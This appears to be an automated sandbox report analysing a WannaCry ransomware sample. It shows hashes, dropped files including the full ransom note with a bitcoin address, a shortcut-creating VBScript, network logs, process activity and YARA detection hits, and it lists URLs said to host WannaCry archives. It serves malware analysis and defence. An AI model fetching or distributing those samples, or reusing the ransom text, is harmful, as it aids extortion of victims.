Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\@WanaDecryptor@.exe	LisectAVT_2403002A_126.EXE.exe	Get hash	malicious	Wannacry, Conti	Browse
	LisectAVT_2403002A_126.EXE.exe	Get hash	malicious	Wannacry	Browse
	LisectAVT_2403002A_223.exe	Get hash	malicious	Wannacry	Browse
	https://github.com/limiteci/WannaCry	Get hash	malicious	Wannacry	Browse
	https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip	Get hash	malicious	Conti, Wannacry	Browse
	Request for Quotation (RFQ_196).zip.zip	Get hash	malicious	Wannacry, Conti	Browse
	https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/raw/master/Ransomware.WannaCry.zip	Get hash	malicious	Wannacry, Conti	Browse
	jTwrz6fY44.exe	Get hash	malicious	Wannacry, Cryptolocker	Browse
	ZN5KdHxjL1.exe	Get hash	malicious	Wannacry	Browse
	wannacry.exe	Get hash	malicious	Wannacry, Conti	Browse

Process:	C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.710902136409594
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnS4RQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3ChvWmMo+S
MD5:	7E6B6DA7C61FCB66F3F30166871DEF5B
SHA1:	00F699CF9BBC0308F6E101283ECA15A7C566D4F9
SHA-256:	4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
SHA-512:	E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
Malicious:	false
Yara Hits:	Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\@Please_Read_Me@.txt, Author: Florian Roth
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

Process:	C:\Users\user\AppData\Local\Temp\wBQInv.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590533258463712
Encrypted:	false
SSDEEP:	384:1FzSUXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:20QGPL4vzZq2o9W7GsxBbPr
MD5:	7DF91FED83572913F4BAB325E771D8B6
SHA1:	53CD11B13A26DE7623F6F7B45E9341F372594339
SHA-256:	C5B7E0DFB2CB92AE7C6EF333F0DE3C6F208AA315192F4C93875D550140A886C8
SHA-512:	4A6DB4F3B1ABFE84170C9C1CA6C5556519234AAFDFF1B98101A8FA7AE539D3B7FAB0C5688CA1078837A533DA69E2195F067DBA56DCF15177DF56E2CF28A2B277
Malicious:	true
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	697182
Entropy (8bit):	5.23536702100778
Encrypted:	false
SSDEEP:	12288:zBXiKZWAAllNJheaP7Qata8JtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp610:D+
MD5:	28A6C40E659C4D6059BBA571FA7253C6
SHA1:	5C52856AA14C9989CD1EDC4D577F51D88172EA3C
SHA-256:	C4CD7365FC3EF086C1BEEFB4200DDE7E0D7C7F5994429FEE4F1277D170576276
SHA-512:	DAA99BA9DB4EE243968EC5160607A9E357EF6D173F0EFC511E4221A4DDB2154648320FBCED50AD43C02EB7CDAC940078CE79C72D2788ABBF7B2784E6502E8807
Malicious:	false
Preview:	.....z.G....q..>p%.S,.y.lTz.Z.`$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9897103359255355
Encrypted:	false
SSDEEP:	192:QZQvoGbr0S0l8eyKvjEflpzuiF8Z24IO8yp:pQSr0Zl8ePjgzuiF8Y4IO86
MD5:	C871FF7FD594A7141767F6084C167E65
SHA1:	573F6ABD8475CA1F3DA7CFD8313AD7FE31F11A45
SHA-256:	4321F17D148F4E02F1804F3470DDF82792FB3260F2BD0710B6C4F55A5DAB5405
SHA-512:	2179B3BEF35919D8B36A5EAA05AD06C99BC5F6597C811B8C2190F8EC327FDBD16433F026408A64D113DB94BFC7214992AB110AB1EE13195E014B5B7462948026
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.5.0.3.9.4.9.3.4.5.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.5.0.4.1.3.2.1.6.0.1.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.b.a.6.d.8.2.-.9.9.7.2.-.4.e.8.4.-.a.d.3.d.-.3.b.d.f.f.9.b.7.4.1.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.1.f.4.9.4.d.-.b.5.9.4.-.4.a.1.3.-.b.2.9.c.-.d.a.0.8.8.3.a.c.5.d.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.B.Q.I.n.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.0.-.0.0.0.1.-.0.0.1.4.-.b.7.7.e.-.7.1.6.c.e.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.0.b.6.a.6.d.3.2.4.5.a.a.5.c.5.9.2.5.0.d.2.9.5.7.b.7.9.a.7.3.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.w.B.Q.I.n.v...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

Process:	C:\Windows\System32\dllhost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.6785130725630784
Encrypted:	false
SSDEEP:	24:08bYeV/bYeVvIU3cizm8bYeV/bYeVvIU3ciz:08bDxbDWU3ciC8bDxbDWU3ci
MD5:	66014E0ACD9F5AD3840889A14E5514C4
SHA1:	7F63D57FF49026267545FAEBF55D41E4DB29997D
SHA-256:	7B4A482EA2015B2CB68100EAEAFB418ADBF9B442F1CA7DBF0F887A93434A9D04
SHA-512:	5F4AA84D461B1F40CA149B5AE519217F1A884BA2F6DBCF63DD33FBC61AF15FC402256814679B6E73977E8D25615ECCB9C333CF4BED3318105060343B8D243E84
Malicious:	false
Preview:	.p.\|..........-.....:.I..(...{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\.........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................0u.............................................................................-............................. ..........P.......h.%.......#......./..(...{..................C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t............................................................................................................

Process:	C:\Windows\SysWOW64\cscript.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 25 22:50:30 2024, mtime=Thu Jul 25 22:50:30 2024, atime=Fri May 12 05:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	580
Entropy (8bit):	5.1602313887772375
Encrypted:	false
SSDEEP:	12:8ORypzYNbQthdUoTAjAtNo9UNlpKJ2JzBmV:8ORBq9UAJlpKJ2Jtm
MD5:	E56DDAF80E047E701D2E3E291DA97217
SHA1:	FF3DE5A812301977F3F06321805CE59D7D19A1A6
SHA-256:	46615DA1D754A5FB40E04B1A9E5CD51D71958AFA9D87EFE674CCAC66354A6706
SHA-512:	B0269A491C82F918E9F0AC3E1877B0C5F0697C0D4F51B080CA036CF34036EBC8FFEC75DD2551D2CFB40DC8B7CA1429E7EF93D69C53CA70B7957CD64A5E4EAA6D
Malicious:	false
Preview:	L..................F.... ....n.n.....n.n.....`.1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_...B,Ho......`o......t.2......J.2 .@WANAD~1.EXE..X.......XP..XP......=........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......]...............-.......\...........'q.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......701188...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.001098183947439
Encrypted:	false
SSDEEP:	3:gponhvDCKFcsD0naRRlynJ96JS2x9rbP0naRRlynJSK2Fvn:e+hvbcSRoJgJSoPcSRoJSK2Fv
MD5:	49B887DF2E11FD596821B9FAC0ACD90F
SHA1:	796521E79F7450B796900BF0CBF926A1A69727AB
SHA-256:	34108826AF5B31ABC140E7499D3999252F6D1749DA6A049276BF94555F812624
SHA-512:	8920AB5511C2CD06C792E53399CD39D3C708BA73C31EBA73472795B02C73AE0A0E1DA8CC37C20ED107468CE54853E06EB149E5E895C760B5D9053B511BE2BA8C
Malicious:	true
Preview:	SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9925650690603876
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File size:	3'534'848 bytes
MD5:	47ca2af9d739bf1a16d8480fd875e782
SHA1:	c2e60a77a411e93a86813a678315e65c1a4727e3
SHA256:	5064c5a2e7ead815daffd1dc3126ce6286240404f4416ce5f4f5550fa3c3a820
SHA512:	386c0e991b020a520bb90a780799ac23e281e1cb4106345071d2549a31c13e29c8c9d9ae10f21326eab36146e5b59405fa66873f3a7a408e31639f18b926ef85
SSDEEP:	98304:XqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3:XqPe1Cxcxk3ZAEUadzR8yc4g
TLSH:	E9F533F4E221B7ACF2550EF64855C59B6A9724B1EBEF1E26DA8001A71D84F3F8FC0491
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

Entrypoint:	0x75a000
Entrypoint Section:	];Au~
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	68f013d7437aa653a8a98a05807afeb1

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd5a8	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x349fa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x1d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x69b0	0x7000	920e964050a1a5dd60dd00083fd541a2	False	0.5747419084821429	data	6.404235106100747	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x5f70	0x6000	2c42611802d585e6eed68595876d1a15	False	0.5781656901041666	data	6.66357096840794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x1958	0x2000	83506e37bd8b50cacabd480f8eb3849b	False	0.394287109375	Matlab v4 mat-file (little endian) ry, numeric, rows 0, columns 0	4.4557495078691405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x10000	0x349fa0	0x34a000	f99ce7dc94308f0a149a19e022e4c316	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
];Au~	0x35a000	0x5000	0x5000	3d9cb625aa8c1c4c3ea723113d7908d5	False	0.64267578125	data	6.037881193062587	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
XIA	0x100f0	0x349635	Zip archive data, at least v2.0 to extract, compression method=deflate	English	United States	1.0002689361572266
RT_VERSION	0x359728	0x388	data	English	United States	0.46349557522123896
RT_MANIFEST	0x359ab0	0x4ef	exported SGML document, ASCII text, with CRLF line terminators	English	United States	0.42913697545526525

DLL	Import
KERNEL32.dll	GetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
USER32.dll	wsprintfA
ADVAPI32.dll	CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
MSVCRT.dll	realloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 01:50:28.519965887 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:28.525269032 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:28.525420904 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:28.525578022 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:28.530378103 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:28.954386950 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:28.954468012 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:28.954895973 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:28.954943895 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:28.970340014 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:28.975227118 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:32.337037086 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:32.343308926 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:32.343893051 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:32.344798088 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:32.350991964 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:32.752643108 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:32.752698898 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:32.752778053 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:32.753711939 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:32.758496046 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:35.944144964 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:35.949026108 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:35.949099064 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:35.955559015 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:35.960711002 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:36.345341921 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:36.345422029 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:36.345457077 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 26, 2024 01:50:36.345516920 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:36.348314047 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 26, 2024 01:50:36.353176117 CEST	799	49701	44.221.84.105	192.168.2.7

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 01:50:28.415174007 CEST	56636	53	192.168.2.7	1.1.1.1
Jul 26, 2024 01:50:28.512159109 CEST	53	56636	1.1.1.1	192.168.2.7

Target ID:	0
Start time:	19:50:26
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
Imagebase:	0x400000
File size:	3'534'848 bytes
MD5 hash:	47CA2AF9D739BF1A16D8480FD875E782
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.1256386714.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1797315090.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.3703395638.000000000040F000.00000004.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
Reputation:	low
Has exited:	false

Target ID:	4
Start time:	19:50:27
Start date:	25/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	19:50:29
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib +h .
Imagebase:	0x4b0000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	13
Start time:	19:50:31
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	19
Start time:	19:50:32
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\@Please_Read_Me@.txt

C:\@WanaDecryptor@.exe

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ThirdPartyNotices.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ThirdPartyNotices.txt.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WER\Temp\WERC09F.tmp.csv.WNCRY (copy)

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WER\Temp\WERC12D.tmp.txt.WNCRY (copy)

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrobat_sbx\acroNGLLog.txt.WNCRY (copy)

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)

Windows Analysis Report
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Target ID:	23
Start time:	19:50:33
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	19:50:35
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	19:50:36
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
